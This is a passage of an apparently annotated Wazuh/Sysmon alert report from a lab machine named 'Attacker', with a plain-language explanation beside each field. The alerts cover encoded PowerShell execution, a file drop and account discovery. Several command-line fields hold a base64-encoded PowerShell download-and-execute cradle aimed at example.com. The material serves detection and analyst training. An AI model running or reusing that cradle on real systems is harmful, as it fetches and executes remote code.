No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetObject:  HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.details:  \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.115\\elevation_service.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:45.577+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:45.577+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534205.770075
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:33:31.7625296Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280554
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:33:30.374 ProcessGuid: {94294ddc-bc3a-680a-340a-000000000e00} ProcessId: 11408 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bc37-680a-320a-000000000e00} ParentProcessId: 4172 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:33:30.374
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc3a-680a-340a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11408
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bc37-680a-320a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  4172
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:45.593+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:45.593+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534205.778141
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:33:32.4979169Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280555
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:33:32.489 ProcessGuid: {94294ddc-bc3a-680a-340a-000000000e00} ProcessId: 11408 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_3tejp41b.qrm.ps1 CreationUtcTime: 2025-04-24 22:33:32.489 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:33:32.489
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc3a-680a-340a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11408
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_3tejp41b.qrm.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:33:32.489
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:45.913+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:45.913+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534205.780909
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:33:46.6613401Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280712
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:33:45.664 ProcessGuid: {94294ddc-bc49-680a-410a-000000000e00} ProcessId: 6832 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bc47-680a-3f0a-000000000e00} ParentProcessId: 7368 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:33:45.664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc49-680a-410a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  6832
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bc47-680a-3f0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  7368
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:36:45.994+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:45.994+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534205.788971
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:33:51.1645018Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280763
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:33:51.154 ProcessGuid: {94294ddc-bc4f-680a-460a-000000000e00} ProcessId: 11932 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:33:51.154
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc4f-680a-460a-000000000e00}
